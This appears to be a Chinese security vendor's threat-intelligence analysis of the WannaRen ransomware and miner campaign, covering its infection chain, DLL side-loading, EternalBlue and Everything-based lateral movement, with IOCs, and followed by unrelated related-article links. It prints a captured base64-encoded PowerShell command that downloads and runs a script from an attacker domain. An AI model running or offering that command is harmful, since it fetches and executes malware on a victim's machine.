近日,有网友在社交媒体公开求助,称感染了一款名为WannaRen的新型勒索软件,部分文件被加密,需要支付0.05个比特币(约合2500元人民币)。

部分截图如下:

WannaRen解密器图标伪装Everything。

奇安信病毒响应中心在发现该情况后,第一时间发布了关于该WannaRen的样本解密器分析报告。

WannaRen勒索软件事件分析报告

https://mp.weixin.qq.com/s/pWB1Ex2X6AcSSMIswLizXg

勒索软件的样本解密器截图:

为了进一步补充攻击视角,奇安信威胁情报中心红雨滴团队详细分析事件后,将更多关于该勒索攻击的检测维度公布。

攻击事件分析

根据线索,我们发现于4月2号天擎用户的拦截日志显示

powershell.exe -ep bypass -e

SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA

通过解码发现powershell会去下载并执行cs.sslsngyl90.com的脚本。

实际上该域名会重定向至如下链接。

http://cpu.sslsngyl90.com/vip.txt

从Vip.txt中的脚本可见攻击者会从vim-cn.com图床上下载WINWORD.EXE和wwlib.dll,这种是典型的白加黑攻击手段。通过执行WINWORD.EXE即可加载于同一目录的wwlib.dll。

紧接着wwlib.dll会去加载Public\目录下的you程序,有趣的是,fm文件会记录程序的运行时间,该时间使用简体中文进行记录,因此攻击者是中国人的概率非常大。

该程序需要会使用busahk87909we对you进行解密,解密后在内存加载WannaRen勒索软件

之后的事,跟开头的感染后的症状一致了。

除了上面的勒索情况外,Powershell下载器还具有挖矿功能,其下载后会重命名为nb.exe,其意指中文的**

有趣的是,在事情发酵之后,攻击者删除了脚本中,下载勒索模块的链接,变成了下面这个模块。

我们可以合理的猜测,勒索软件作者都没有料到,就因为他将勒索软件命名为WannaRen,收到了如此大的关注,因此将链接删掉从而试图逃避检测。

然而目前事情居然上了微博热搜,而且阅读量高达1.1亿,只能说当年的WannaCry余威仍在不断散发,攻击者这次是不好跑了。

横向移动功能

从Powershell下载器中可以看到,攻击者会通过图床链接去下载永恒之蓝传播模块。

而office.exe实际上是自解压文件。

此外,该脚本还有一种很少见的横向移动辅助手法,该手法利用了Everything拥有的http服务器功能。

首先,其会在受害器上下载aaaa.exe,并保存到C:\Users\Public\目录下,功能为释放everything并开启http服务器功能,这样在同一内网的其他受害者就可以通过该http服务器下载上面的恶意程序,从而进一步的扩散受害面。

关联分析

通过攻击者的域名,我们发现sslsngyl90.com在1月份奇安信威胁情报中心与就已经将该域名与HideShadowMiner组织的攻击关联在一起,并将域名置黑,因此部署相关情报产品的用户均无遭受此威胁。

HideShadowMiner,国内统称为匿影组织,该组织此前一直进行挖矿攻击,此前国内友商就曾发布过该组织的攻击报告:

http://www.ijinshan.com/info/202003201525.shtml

此外,我们通过特征,发现匿影组织还使用了多个域名搭载同一套Powershell攻击框架发起攻击。

http://us.howappyoude.club/v.txt

http://cpu.goolecpuclan.xyz/vip.txt

相关攻击域名在全网的访问趋势图,时间集中在近期,符合事件发生时段。

除了上面的线索外,还需要注意的是,攻击者会通过微当下载去下载APK程序,并重命名为exe文件,但这也意味着,微当下载并没有识别出该APK是恶意的PE程序并进行了放行,这对于攻击者来说是一个非常好利用的资源。

微当下载的软件提交方式

总结

万幸的是,虽说整个攻击过程都被奇安信分析人员解析清楚,但是由于在2020年4月2天擎就已能检测执行Powershell攻击的行为,因此我们的用户无一中招。

此外,退一万步说,即使Powershell执行起来了,但是对应的勒索病毒模块同样被天擎查杀。

红雨滴团队提醒广大用户,及时备份重要文件,更新安装补丁,切勿打开社交媒体分享的来历不明的链接,不点击执行未知来源的邮件附件,不运行夸张的标题的未知文件,不安装非正规途径来源的APP。

我们提供了IOC,以供用户自查。

IOC

cpu.sslsngyl90.com/xx.txtcpu.sslsngyl90.com/wmi.txtus.howappyoude.club/v.txtcpu.goolecpuclan.xyz/vip.txtxx.sslsngyl90.comxx.sslsngyl90.comwmi.sslsngyl90.comwmi.sslsngyl90.comd.sslsngyl90.comcs.sslsngyl90.comcpu.sslsngyl90.comsslsngyl90.com

相关恶意程序下发路径

C:\ProgramData\227.exeC:\ProgramData\office.exeC:\ProgramData\nb.exeC:\ProgramData\WinRing0x64.sysC:\ProgramData\officekms.exeC:\ProgramData\xeexfrt.txtC:\Users\Public\MicrosftEdgeCP.exeC:\Users\Public\1\winlogtrf.exeC:\ProgramData\227.txtC:\Users\Public\ aaaa.exeC:\Users\Public\youC:\ProgramData\wwlib.dll

Powershell下载器Hash

6355d278e4b9caec1f9774db5d2c54aa

WannaRen勒索软件主体Hash

9854723bf668c0303a966f2c282f72ea

最新WannaRen病毒来袭,无力查杀?其来路早已被切断相关推荐

  1. 内网计算机病毒如何查杀,如何追踪并查杀局域网ARP病毒 局域网如何查杀ARP病毒...

    今天给大家带来如何追踪并查杀局域网ARP病毒,局域网如何查杀ARP病毒,让您轻松解决问题. 怎样追踪并查杀局域网ARP病毒 局域网怎样查杀ARP病毒 目前防护局域网中ARP木马病毒最有效的方法是通过网 ...

  2. 金山毒霸2012正式公测 首次实现新病毒99秒查杀

    7月12日,国内专业杀毒软件金山毒霸2012(猎豹)今日正式开始公测.这款代号为"猎豹"的新版产品最大特色就是像猎豹一样快.准.狠,不仅首次实现了对全新病毒的99秒查杀,还实现了对 ...

  3. mm.aa88567.cn是何病毒?如何查杀?

    2009年11月16日,安全机构监测到,一个名为"无极杀手"变种b(Win32/Piloyd.b)的病毒正在互联网上疯狂传播,该病毒在短短20天的时间内就感染了37万余台计算机.该 ...

  4. ARP病毒的简易查杀方法

    最近一位朋友的网吧遇到病毒,经常断网并且网络速度缓慢,猜测是ARP病毒,以前还不曾遇到过ARP病毒的感染情况,只是听说而没有实践过.这次,在网络中快速查阅了相关资料,对ARP病毒的查杀有了新的认识. ...

  5. 木马病毒的万能查杀方法

    "木马"程序会想尽一切办法隐藏自己,主要途径有:在任务栏中隐藏自己,这是最基本的办法.只要把Form的Visible属性设为False,ShowInTaskBar设为False,程 ...

  6. U盘病毒mydocuments.exe查杀办法总结

    病毒现象:U盘自动生成一个名称为mydocuments.exe的文件,U盘中所有文件自动存入此文件. win7系统: 1.CTRL+ALT+DEL打开任务管理器,找到 WINLOGON.exe(注意一 ...

  7. 手工查杀病毒常见文件型分析总结

    很久没写点自己的东西了,今天更新点这么久来积累的一点关于病毒查杀方面的东西,希望对大家日后遇到常见病毒,各种顽固病毒都能有应对的策略. 希望我的这些经验能对大家以后查杀病毒有所帮助,不足之处请高手指点 ...

  8. 病毒木马查杀实战第001篇:基本查杀理论与实验环境配置

    前言 <病毒木马查杀>系列以真实的病毒木马(或统称为恶意程序)为研究对象,通过现有的技术手段对其分析,总结出它的恶意行为,进而制定出相应的应对方法(如编写专杀工具),对其彻底查杀.当然,本 ...

  9. 病毒木马查杀实战第019篇:病毒特征码查杀之编程实现

    前言 上次我们已经简介过了病毒特征码提取的基本方法,那么这次我们就通过编程来实现对于病毒的特征码查杀. 定义特征码存储结构 为了简单起见.这次我们使用的是setup.exe以及unpacked.exe ...

最新文章

  1. 我自学python的路-我的python后端学习路线
  2. 23 DesignPatterns学习笔记:C++语言实现 --- 2.2 Adapter
  3. Extjs可视化设计视频教程三
  4. Java基础---异常---turow和throws
  5. 欧拉和格拉斯曼解释平行宇宙
  6. html页面滚动导致阴影出现,三种处理滚动穿透问题方案的对比
  7. 【南邮操作系统实验】页面置换算法(FIFO、LRU、OPT)图形化界面(JavaFx)
  8. 【Maven】import maven依赖安装失败——暂时玄学解决
  9. goeasy的ios无后台接收消息的一些bug解决
  10. 恒德可视化指挥调度解决方案
  11. 实现添加数据、地图放大、缩小、漫游、全景视图、鹰眼图的操作(ICommand、ITool)...
  12. 项目时间(项目活动持续时间估算、计划编制)笔记
  13. iOS攻城狮修炼之路
  14. 编码技巧——全局异常捕获统一的返回体业务异常
  15. java 假设检验_Spark机器学习-Java版(二)-相关系数和假设检验
  16. ZYNQ 或ZYNQ Ultrascale PS/PL交互
  17. 如何去除PDF中的水印,PDF去水印方法
  18. 以太坊漏洞分析————1、溢出漏洞
  19. OkHttp完美封装,一行搞完外部请求
  20. Harmonic Number 调和级数

热门文章

  1. [WPF实践之路] 目录导航
  2. web 页面乱码的解决办法
  3. 多线程实现HTTP下载器(断点续传)_使用IO和线程知识
  4. 多视图几何中的三维重建
  5. 美股股票代码 A股 香港股票代码 上海股票代码 深圳股票代码csv
  6. 找男朋友软件测试大乐,抖音2020男朋友测试题答题
  7. ue64ctmn.dll无法删除问题
  8. 晚上诱捕白面鸡放公叫_免费游戏如何通过设计诱捕玩家
  9. 网络角斗士棋竞技对战平台
  10. Asp.net Web Api开发(第二篇)性能:使用Jil提升Json序列化性能